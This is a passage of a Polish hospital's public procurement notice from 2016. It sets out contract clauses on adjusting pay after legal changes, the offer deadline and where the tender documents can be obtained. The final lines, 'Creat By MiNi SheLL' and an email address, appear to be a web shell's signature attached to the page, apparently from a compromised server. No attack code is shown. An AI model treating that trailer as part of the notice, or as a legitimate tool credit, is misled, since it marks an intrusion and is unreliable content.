     wraz z informacją o rodzajach posiadanych przez nich umów oraz wysokości   
     wynagrodzenia, 
-   liczbę roboczogodzin przepracowanych przez osoby zaangażowane przy  
     realizacji przedmiotu Umowy,
-   procentowe zaangażowanie czasu pracy określonego w umowie zawartej  
    pomiędzy daną osobą a Wykonawcą na potrzeby realizacji przedmiotu Umowy.
8. 	Wykonawca odpowiada za złożenie dokumentów, o których mowa w ust. 7, w terminie umożliwiającym Zamawiającemu sprawdzenie poprawności przedłożonych dokumentów oraz zasadności dokonanych wyliczeń, zgłoszenie ewentualnych zastrzeżeń przez Zamawiającego i ustosunkowanie się do nich przez Wykonawcę, z uwzględnieniem postanowień ust. 3 lit. b), wykorzystując w tym celu w szczególności okres między publikacją aktu prawnego wprowadzającego zmiany przepisów, o których mowa w ust. 2 pkt 5 lit. d) i e), a jego wejściem w życie.
9. 	Zamawiający w terminie 14 dni licząc od dnia każdorazowego otrzymania dokumentów, o których mowa w ust. 7, informuje Wykonawcę o zaakceptowaniu wniosku o zmianę wynagrodzenia albo zgłasza zastrzeżenia lub uwagi do przedłożonych dokumentów, w formie pisemnej lub drogą elektroniczną;
10. 	Zamawiający zaakceptuje wniosek o zmianę wynagrodzenia, o którym mowa w ust. 7, wyłącznie w przypadku jeżeli Wykonawca udowodni ponad wszelką wątpliwość, że zaistniała zmiana przepisów, o których mowa w ust. 2 pkt 5) lit. d) i e), ma bezpośredni wpływ na koszty wykonania przedmiotu Umowy oraz określi stopień, w jakim wpłynie ona na wysokość wynagrodzenia określonego w Umowie. Brak reakcji Zamawiającego w terminie określonym w ust. 9 rozumiany będzie jako zaakceptowanie wniosku o zmianę wynagrodzenia
11. 	Wykonawca zobowiązany jest do ustosunkowania się do zastrzeżeń lub uwag Zamawiającego w terminie uwzględniającym postanowienia ust 3 lit. b) i ust.8
 
12. 	 Zmiany, o których mowa w ust. 2 pkt 2, 4 i 5 lit. a) - c ) nie wymagają dla swej ważności zawierania aneksu do Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spkso.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Kliniczny Szpital Okulistyczny - 03-709 Warszawa, ul. Józefa Sierakowskiego 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2016 godzina 10:00, miejsce: Samodzielny Publiczny Kliniczny Szpital Okulistyczny - 03-709 Warszawa, ul. Józefa Sierakowskiego 13 - Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com